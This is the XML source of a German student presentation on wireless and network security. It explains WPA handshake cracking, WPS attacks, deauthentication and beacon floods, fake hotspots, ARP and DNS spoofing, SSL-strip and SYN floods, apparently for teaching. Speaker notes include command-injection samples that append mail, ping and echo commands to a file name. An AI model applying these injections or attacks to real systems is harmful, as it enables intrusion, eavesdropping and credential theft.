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80"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId81"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="295" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="276" r:id="rId7"/>
    <p:sldId id="279" r:id="rId8"/>
    <p:sldId id="280" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="293" r:id="rId12"/>
    <p:sldId id="294" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="283" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="28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42" r:id="rId37"/>
    <p:sldId id="355" r:id="rId38"/>
    <p:sldId id="356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57" r:id="rId51"/>
    <p:sldId id="326" r:id="rId52"/>
    <p:sldId id="327" r:id="rId53"/>
    <p:sldId id="328" r:id="rId54"/>
    <p:sldId id="329" r:id="rId55"/>
    <p:sldId id="330" r:id="rId56"/>
    <p:sldId id="332" r:id="rId57"/>
    <p:sldId id="358" r:id="rId58"/>
    <p:sldId id="333" r:id="rId59"/>
    <p:sldId id="334" r:id="rId60"/>
    <p:sldId id="335" r:id="rId61"/>
    <p:sldId id="336" r:id="rId62"/>
    <p:sldId id="359" r:id="rId63"/>
    <p:sldId id="337" r:id="rId64"/>
    <p:sldId id="338" r:id="rId65"/>
    <p:sldId id="339" r:id="rId66"/>
    <p:sldId id="340" r:id="rId67"/>
    <p:sldId id="360" r:id="rId68"/>
    <p:sldId id="343" r:id="rId69"/>
    <p:sldId id="345" r:id="rId70"/>
    <p:sldId id="346" r:id="rId71"/>
    <p:sldId id="347" r:id="rId72"/>
    <p:sldId id="349" r:id="rId73"/>
    <p:sldId id="348" r:id="rId74"/>
    <p:sldId id="361" r:id="rId75"/>
    <p:sldId id="351" r:id="rId76"/>
    <p:sldId id="352" r:id="rId77"/>
    <p:sldId id="353" r:id="rId78"/>
    <p:sldId id="354" r:id="rId7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CBCBCB"/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 autoAdjust="0"/>
    <p:restoredTop sz="87263" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="111" d="100"/>
          <a:sy n="111" d="100"/>
        </p:scale>
        <p:origin x="14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pPr/>
              <a:t>11.01.16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pPr/>
              <a:t>11.01.16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25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6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6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78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file.txt;mail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tester@test.com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file.txt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//send an email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yourself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file.txt;ping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www.test.com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//ping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file.txt;echo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&gt;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test.txt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test.txt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31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92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4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5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Sicherungsmaßnahmen und Bewertung:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Demo dazu später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65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Key nicht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ein Herstellerfeature und nicht im Standard beschrieben, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Schwächt die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>verschlüsselung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, da viel über den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erfahren werden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Open System: Authentifizieren kann jeder, senden nur der mit dem entsprechenden Kennwort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6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8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Beacon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Generierung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Fake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über </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Beacon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-Frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Crash des Netzwerkscanners oder Treibers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-D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Absturz des Angriffs-Rechners möglich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Authentication Dos Mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t> zu allen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Aps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range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t> =&gt; zu viele Clients, frieren daher ein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WPA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>downgrade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endParaRPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Abmelden von Clients an Stationen, die WPA einsetzen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Schauen ob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t> WEP aktiviert oder keine Verschlüsselung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92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4way-Handshake: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Einige Infos/Schlüssel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t> zwischen werden zwischen AP und Client ausgetauscht.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Zum Teil Random und zum Teil auch Berechnete (SSID)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Zum Schluss wird ein MIC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(Message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Check) errechnet.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Diese Berechnungen werden selber ausgeführt mit eigenem Passwort.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Erhält man den selben MIC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, hat man das richtige Passwort „erraten“.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4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9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48DAB-2417-E040-ADE8-0DE3F02E62F1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18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sdsd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F08C7-EEA1-D54F-B803-ED3280BF054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Autorenname	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20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72" y="1604841"/>
            <a:ext cx="8228763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2108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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.emf"/><Relationship Id="rId1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3.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.emf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tmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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Relationship Id="rId3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946859" cy="376237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>13.01.2016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8570" y="4122471"/>
            <a:ext cx="4535119" cy="367293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Projektteam 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Security Work </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Bench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 wenig genutzten Access Points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>vergeht evtl. viel Zeit bis die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>	benötigte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Menge an Datenpaketen aufgezeichnet wurde</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Der Angriff kann je nach Vorgehensweise komplett passiv erfolgen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Generierung von zusätzlichem Datenverkehr durch den Angreifer 	(Packet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Open System Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Generierung von ARP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> durch geeignetes aufgezeichnetes Datenpaket oder aufgezeichnete ARP-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325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err="1" smtClean="0"/>
              <a:t>DoS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Blockieren von Traffic auf dem Ziel-Access Point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Aufzeichnen eines Handshakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Erzwingen schwächerer / keiner Verschlüsselung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Verbindung auf einen anderen Access Point erzwingen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Möglichkeiten für Störungen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Beacon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>ode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>WPA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Downgrade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/>
              <a:t>Michael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exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> (TKIP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Beschränkung auf einen Access Point bei vielen Angriffen möglich</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angriffe nicht immer erfolgreich durchführbar</a:t>
            </a:r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25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err="1"/>
              <a:t>Fake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" dirty="0"/>
              <a:t>-AP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Angriffsmöglichkeiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ausgabe als Hotspot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ersetzen eines bisherigen Access Points in der Umgebung</a:t>
            </a:r>
          </a:p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Ausspähen von Informationen (Passwörter, Kreditkarten)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Einschleusen von Schadcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ablauf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Eventuelles Blockieren eines vorhandenen Access Points</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Erstellen eines eigenen Access Points / Hotspots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Warten auf sich verbindende Clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Verteilung einer Anmeldemaske (Kreditkarten / Passwörter) / Manipulation 	  des Datenverkehrs / Infektion mit Schadcode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655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WPA2 gilt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, bei ausreichend langem Key, bisher als </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>sicher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angriffe auf den PSK von WPA/WPA2 gesicherten Netzwerken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Verfahren für WPA und WPA2 identisch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DE" dirty="0"/>
              <a:t>Dazu einen Handshake zwischen einem Client und dem AP aufzeichnen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Identifizieren des anzugreifenden Access Points und der SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Versetzen des WLAN Interfaces in den Monitoring Mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Optional: MAC-Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Aufzeichnen eines Handshakes zwischen Client und Access Point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>„Offline“ Cracken des Keys in der Aufzeichnung</a:t>
            </a:r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70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Verschiedene Ansatzmöglichkeiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Bruteforce</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Dictionary-Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Rule-based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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Demonstrativer Vergleich der Geschwindigkeiten zwischen Grafikkarte und CPU (nicht auf dem virtuellen Image nachstellbar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Vergleich verschiedener Tools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aircrack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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>hashcat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34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WPA/WPA2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Bruteforcing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> werden verschiedene Passwörter nach einem bestimmten Erzeugungsmuster durchgetestet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Es wird dabei die Länge und die zu testenden Zeichen festgelegt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Die Laufzeit kann, abhängig von Länge und Komplexität, von wenigen Minuten bis zu vielen Jahren betragen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Bei einem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Dictionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Angriff werden viele Passwortkandidaten aus einer Wörterliste durchgetestet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Wörterlisten sind frei im Internet verfügbar und beinhalten häufig verwendete Passwörter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265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WPS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 auf den PIN, der für bei WPS für die Verbindung zwischen Client und Access Point verwendet wird</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>WPS muss dauerhaft auf dem AP aktiviert sein</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angriff dauert zwischen 4 – 6 Stunden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Für eine praktische Vorführung eher ungeeignet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Theoretische Durchführung des Angriffs in der Dokumentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Angriff kann auch zu Hause, bei Interesse, leicht durchgeführt werden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382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- was gibt es noch zu tun? - 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90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Für die Zukunft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7600" y="19199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Die Dokumentation ist sicher noch nicht „perfekt“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ausarbeitung weiterer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Angriffszenarien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> &amp; Angriffsarten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Es wird in Zukunft weitere Sicherheitslücken im Bereich Wireless Security geben</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone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6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13.01.16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Julian Rieder, Sebastian Schuster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Netzwerk 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28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Implementierungen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>ARP-Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>DNS-Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>SSL-Strip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Fake-IPv6-Netz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Live-Demo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091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946859" cy="376237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>13.01.2016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8570" y="4122471"/>
            <a:ext cx="4535119" cy="367293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Josef König, Christian Paulus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Wireless Security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544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Zugang zum angegriffenen Netz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angriffsrechner mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark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ARP-Spoofing - Voraussetzungen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5884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Man-In-The-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Middle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> Angriff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Mitlesen und Manipulieren von Netzwerkverkehr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Eigener Rechner erscheint als Gateway (ARP-Replys)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>ARP Tabelle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Opfer: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ARP-Spoofing - Funktionsweise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78" y="4190362"/>
            <a:ext cx="3839999" cy="90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8" y="4190362"/>
            <a:ext cx="3768226" cy="90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5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ARP-Spoofing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95" y="1414166"/>
            <a:ext cx="5511100" cy="486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869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Security-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ARP-Spoofing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2" y="1550655"/>
            <a:ext cx="5519904" cy="486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379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Manipulation eines DNS-Eintrags (Zuordnung Domainname &lt;-&gt; IP-Adresse) auf „falsche“ IP-Adresse, um Datenverkehr unbemerkt mitlesen zu können.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Durch „gefälschte“ DNS-Responses wird falscher IP-Eintrag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>an Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>übermittelt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Bei Aufruf dieser Domain stellt Client Verbindung zu „falscher“ IP-Adresse her.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DNS-Spoofing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909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DNS-Cache (vorher/nachher)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr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DNS-Spoofing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4" y="2682317"/>
            <a:ext cx="3771900" cy="111442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763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HTTPS-Verbindungen können ohne (größeren) Aufwand nicht entschlüsselt werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ziel: Browser / Benutzer dazu bringen, unverschlüsselte HTTP-Verbindung zu verwenden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Durchführung: Gros der Benutzer wird Unterschied von https:// und http:// in Browser nicht bemerken.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Vorgehen: Umwandlung aller https://-Verbindungen in http://-Verbindungen im Quelltext. Anschließend MITM (Client &lt;-http-&gt; MITM &lt;-https-&gt;)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SSL-Strip</a:t>
            </a:r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" y="5770623"/>
            <a:ext cx="2438740" cy="628738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4" y="5751378"/>
            <a:ext cx="2343477" cy="6858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946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TCP-Verbindungen verwenden zum Aufbau einen 3-Way-Handshake (SYN-&gt;SYN-ACK-&gt;ACK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Wenn auf SYN-ACK von Server der (angreifende) Client keine ACK-Antwort sendet, werden für eine bestimmte Zeit Ressourcen auf Server für (angreifenden) Client aufgespart.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Vielzahl der Anfragen sorgen für Überlastung des Servers und damit Unerreichbarkeit für „normale“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>Benutzer.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124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Funktionsweise:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>TCP-Verbindungen verwenden zum Aufbau einen 3-Way-Handshake (SYN-&gt;SYN-ACK-&gt;ACK)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Wenn auf SYN-ACK von Server der (angreifende) Client keine ACK-Antwort sendet, werden für eine bestimmte Zeit Ressourcen auf Server für (angreifenden) Client aufgespart.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Vielzahl der Anfragen sorgen für Überlastung des Servers und damit Unerreichbarkeit für „normale“ Benutzer.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SYN-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120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Zugang zum angegriffenen IPv4 Netz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angegriffene Rechner mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>unkonfiguriertem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, aber aktiviertem IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
